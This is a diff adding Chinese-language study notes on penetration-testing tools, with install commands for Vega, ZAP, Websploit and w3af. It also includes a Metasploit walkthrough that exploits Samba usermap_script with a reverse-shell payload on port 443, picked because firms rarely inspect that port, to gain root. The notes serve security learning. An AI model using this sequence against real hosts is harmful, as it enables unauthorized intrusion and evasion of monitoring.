继续第三章

--- a/src/ch-7-02.md
+++ b/src/ch-7-02.md
@@ -201,3 +201,161 @@ $ sudo vim /opt/proxystrike/trunk/attacker.py
 ```
 
 这样就安装成功了。
+
+#### ProxyStrike 可作代理
+
+ProxyStrike 对浏览器配置，使其运行时经过 ProxyStrike，这样可在浏览目标网站时在后台分析所有参数。用来识别、拦截和修改请求内容。默认端口为 8008，比如火狐浏览器的 Firefox > Preferences > Network Proxy ,选择 Settings ， ManualProxy, 输入装有 ProxyStrike 服务器 IP 地址，端口号选择 8008，你也可同步修改该端口。
+
+打开 `ProxyStrike`
+
+### 4、Vega
+
+参考网页：
+- https://samiux.blogspot.com/2017/09/howto-install-vega-10-on-ubuntu-16043.html
+
+安装，
+
+```bash
+$ sudo su
+# cd /opt
+# wget https://dist.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip
+# unzip VegaBuild-linux.gtk.x86_64.zip
+# rm VegaBuild-linux.gtk.x86_64.zip
+# ln -s /opt/vega/Vega /usr/local/bin/vega
+# exit
+```
+
+这样就安装成功了。直接调用命令 `vega`
+
+怎么使用，等待第二遍阅读的时候填补。
+
+### 5、Owasp-Zap
+
+Owasp-Zap 又称 Zaproxy，安装，貌似可以直接命令行安装。
+
+```bash
+$ sudo apt-get install zaproxy 
+```
+
+安装成功后，使用 `zap` 打开该软件。
+
+### 6、Websploit
+
+是一个扫描分析远程系统漏洞的开源项目。
+安装
+
+```bash
+$ sudo apt-get install websploit
+```
+
+安装成功后，使用 `websploit` 打开该软件。
+
+## 漏洞利用
+
+### 1、metasploit
+
+安装从略。基本了解 metasploit 套路。例子讲的是使用 nmap 扫描目标开放的端口及运行的程序，
+
+```bash
+msf > nmap -n -oX my.xml 192.168.1.0/24
+```
+
+并把结果 *my.xml*导入到 metasploit，查看这些程序，
+
+```bash
+msf > db_import my.xml
+```
+
+使用 `services` 命令查看可用服务。
+
+```bash
+msf > services
+```
+
+看这些结果，不妨看到了 `samba`，为利用该漏洞，搜索
+
+```bash
+msf > search samba type:exploit platform:unix
+```
+
+依据排名，找到靠前的 `usermap_script` 漏洞。使用该漏洞
+
+```bash
+msf > use exploit/multi/samba/usermap_script
+```
+
+查看该漏洞需要那些必选参数，
+
+```bash
+msf > show options
+```
+
+设置这些必选参数，参数从上面扫描可得。`RHOST`,`RPORT`表示远程的主机IP和端口号。
+
+```bash
+msf > set RHOST 192.168.1.103
+msf > set RPORT 139
+```
+
+查看该漏洞需要的攻击载荷。
+
+```bash
+msf > show payloads
+```
+
+选择好攻击载荷
+
+```bash
+msf > set PAYLOAD cmd/unix/reverse
+```
+
+查看该漏洞攻击载荷下有那些专属选项
+
+```bash
+msf > show options
+```
+
+比如需要设置 `LHOST`，`LPORT`,意思是本地主机 IP 地址和端口，端口一般选择 443，因为好多企业都不审查该端口的内容。
+
+```bash
+msf > set LHOST 192.168.1.100
+msf > set LPORT 443
+```
+
+设置好后，攻击。
+
+```bash
+msf > exploit
+```
+
+如果可以获得 `root` 权限，就完全成功了。否则，继续实验其他的方法吧。
+
+### 2、w3af
+
+参考网页：
+- http://w3af.org/
+- https://github.com/andresriancho/w3af
+
+安装，
+
+```bash
+$ sudo apt-get install w3af
+```
+
+本机依赖错误，只好另寻他径。参照官网，
+
+```bash
+$ cd /opt
+$ sudo git clone --depth 1 https://github.com/andresriancho/w3af.git
+$ sudo ln -s /opt/w3af/w3af_gui /usr/local/bin/
+```
+
+安装完成后，使用 `w3af_gui` 打开程序，但是报错，根据错误安装，
+
+```bash
+$ sudo pip install pyClamd==0.4.0 PyGithub==1.21.0 GitPython==2.1.3 pybloomfiltermmap==0.3.14 phply==0.9.1 nltk==3.0.1 tblib==0.2.0 pdfminer==20140328 futures==3.2.0 pyOpenSSL==17.4.0 ndg-httpsclient==0.3.3 pyasn1==0.4.2 lxml==3.4.4 scapy-real==2.2.0-dev guess-language==0.2 cluster==1.1.1b3 msgpack-python==0.4.4 python-ntlm==1.0.1 halberd==0.2.4 darts.util.lru==0.5 Jinja2==2.10 vulndb==0.0.19 markdown==2.6.1 psutil==2.2.1 ds-store==1.1.2 termcolor==1.1.0 mitmproxy==0.13 ruamel.ordereddict==0.4.8 Flask==0.10.1 tldextract==1.7.2 pebble==4.3.6 acora==2.1 esmre==0.3.1 xdot==0.6
+```
+
+用法从略。
+
+## 电子邮件系统的漏洞
